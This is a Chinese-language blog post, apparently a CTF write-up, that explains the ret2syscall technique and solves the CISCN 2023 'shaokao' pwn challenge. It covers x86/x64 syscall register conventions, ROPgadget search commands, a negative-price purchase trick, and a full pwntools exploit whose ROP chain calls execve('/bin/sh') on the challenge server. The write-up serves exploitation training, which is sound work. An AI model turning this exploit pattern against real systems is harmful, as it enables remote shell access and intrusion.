<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Mr.BW">





<title>ret2syscall | Mr.BW的妙妙屋</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    
    <link rel="stylesheet" href="/../fonts/iconfont3/iconfont.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.2.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
        
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Mr.BW&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">文章</a>
                
                    <a class="menu-item" href="/category">类别</a>
                
                    <a class="menu-item" href="/tag">标签</a>
                
                    <a class="menu-item" href="/about">施工中</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Mr.BW&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">文章</a>
                
                    <a class="menu-item" href="/category">类别</a>
                
                    <a class="menu-item" href="/tag">标签</a>
                
                    <a class="menu-item" href="/about">施工中</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">全部展开</a>
        <a onclick="go_top()">回到顶部</a>
        <a onclick="go_bottom()">回到底部</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "全部收起"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "全部展开"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">ret2syscall</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Mr.BW</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">六月 12, 2024&nbsp;&nbsp;12:19:28</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/ctf/">ctf</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>ret2syscall 即通过系统调用控制程序获得shell</p>
<h1 id="Linux系统调用"><a href="#Linux系统调用" class="headerlink" title="Linux系统调用"></a>Linux系统调用</h1><p>过程（32位）：</p>
<p>​	1.把系统调用的编号存放在寄存器EAX中</p>
<p>​	2.传入函数参数到相应的寄存器</p>
<p>​	3.触发int 80号中断</p>
<p>64位：</p>
<p>​	1.调用编号存放到rax中</p>
<p>​	2.传参数到寄存器，前六个参数对应的寄存器： rdi rsi rdx r10 r8 r9</p>
<p>​        注意：系统调用第四个参数放在r10中，平时的函数第四个参数放在rcx</p>
<p>​	3.触发syscall命令中断</p>
<p>各个函数的系统调用号：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Nashi_Ko/article/details/120288385">Linux X86架构 32 64系统调用表_32位 syscall-CSDN博客</a></p>
<h1 id="excve函数"><a href="#excve函数" class="headerlink" title="excve函数"></a>excve函数</h1><p>system函数实际上是调用excve函数，ret2syscall基本上是让程序执行execve函数</p>
<p>函数原型</p>
<p><code>excve(&quot;/bin/sh&quot;,NULL,NULL)</code>   得到shell</p>
<p>excve在32位下系统调用号为11，在16进制下为0xb,所以eax中应该存放0xb</p>
<p>在传上参数，因此相应寄存器参数如下（32位）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">eax = 0xb</span><br><span class="line">ebx = /bin/sh</span><br><span class="line">ecx = 0</span><br><span class="line">edx = 0</span><br></pre></td></tr></table></figure>

<p>在栈和寄存器上分布如下</p>
<p><img src="/../image/ret2syscall/2.png" alt="2"></p>
<h1 id="实例分析"><a href="#实例分析" class="headerlink" title="实例分析"></a>实例分析</h1><p>来源：[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/4055">CISCN 2023 初赛]烧烤摊儿 | NSSCTF</a></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>开启了nx保护和canary保护（canary最后没检查，跟没开一样）</p>
<p>题目情景是到烧烤摊买东西，直到在<code>gaiming()</code>这个函数中才存在溢出</p>
<p><img src="/../image/ret2syscall/3.png" alt="3"></p>
<p>承包摊位后可以改名调用函数，因此想办法赚钱承包即可。</p>
<p>发现买东西时输入没有检查，因此买负数的东西即可赚钱（卖东西（bushi  ）</p>
<p><img src="/../image/ret2syscall/5.png" alt="5"></p>
<p>输入v5后v5内的东西拷贝到name中去，因此binsh直接写在v5中就行，binsh最后要加\x00以防止系统一直往下读</p>
<p>之后按照ret2syscall思路向寄存器传参</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary shaokao --only <span class="string">&#x27;syscall&#x27;</span> <span class="comment">//找syscall命令</span></span><br><span class="line"><span class="comment">//ROPgadget --binary shaokao --only &#x27;int&#x27; //若32位输入这条找int 80</span></span><br><span class="line"></span><br><span class="line">ROPgadget --binary shaokao --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;rax&#x27;</span> <span class="comment">//找rax位置</span></span><br><span class="line">ROPgadget --binary shaokao --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;rdi&#x27;</span> <span class="comment">//找rdi位置</span></span><br><span class="line">ROPgadget --binary shaokao --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;rsi&#x27;</span> <span class="comment">//找rsi位置</span></span><br><span class="line">ROPgadget --binary shaokao --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;rdx&#x27;</span> <span class="comment">//找rdx位置</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>64位中excve调用号位59，因此rax中传入59</p>
<p>注：程序内没有单独的<code>pop rdx ; ret</code>因此利用<code>pop rdx ; pop rbx ; ret</code>来传参，只不过要多一个参数</p>
<p>或者直接利用<code>pop rax;pop rdx;pop rbx;ret</code>在给rax传参数时就给rbx传好参数</p>
<p><img src="/../image/ret2syscall/4.png" alt="4"></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment">#r=process(&#x27;./shaokao&#x27;)</span></span><br><span class="line">r=remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28570</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&#x27;&gt;&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-100000000&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line"><span class="comment">#以上是想办法买下摊位</span></span><br><span class="line">rax=<span class="number">0x458827</span></span><br><span class="line">name=<span class="number">0x4e60f0</span></span><br><span class="line">rdi=<span class="number">0x40264f</span></span><br><span class="line">rsi=<span class="number">0x40a67e</span></span><br><span class="line">rdx_rbx=<span class="number">0x4a404b</span></span><br><span class="line">syscall=<span class="number">0x402404</span></span><br><span class="line">payload=<span class="string">b&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x28</span>,<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">payload+=p64(rax)+p64(<span class="number">59</span>)+p64(rdi)+p64(name)+p64(rsi)+p64(<span class="number">0</span>)+p64(rdx_rbx)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(syscall)</span><br><span class="line"><span class="comment">#以下传参也可</span></span><br><span class="line"><span class="comment">#rax_rdx=0x4a404a</span></span><br><span class="line"><span class="comment">#name=0x4e60f0</span></span><br><span class="line"><span class="comment">#rdi=0x40264f</span></span><br><span class="line"><span class="comment">#rsi=0x40a67e</span></span><br><span class="line"><span class="comment">#rdx_rbx=0x4a404b</span></span><br><span class="line"><span class="comment">#syscall=0x402404</span></span><br><span class="line"><span class="comment">#payload=b&#x27;/bin/sh\x00&#x27;.ljust(0x28,b&#x27;a&#x27;)</span></span><br><span class="line"><span class="comment">#payload+=p64(rax_rdx)+p64(59)+p64(0)+p64(0)+p64(rdi)+p64(name)+p64(rsi)+p64(0)+p64(syscall)</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<p><img src="/../image/ret2syscall/1.png" alt="1"></p>

        </div>

        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/ctf/"># ctf</a>
                    
                        <a href="/tags/pwn/"># pwn</a>
                    
                        <a href="/tags/ret%E7%B3%BB%E5%88%97/"># ret系列</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2024/07/13/24%E9%9B%86%E8%AE%ADweek1/">24集训week1</a>
            
            
            <a class="next" rel="next" href="/2024/06/03/ret2libc/">ret2libc</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Mr.BW | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>


</html>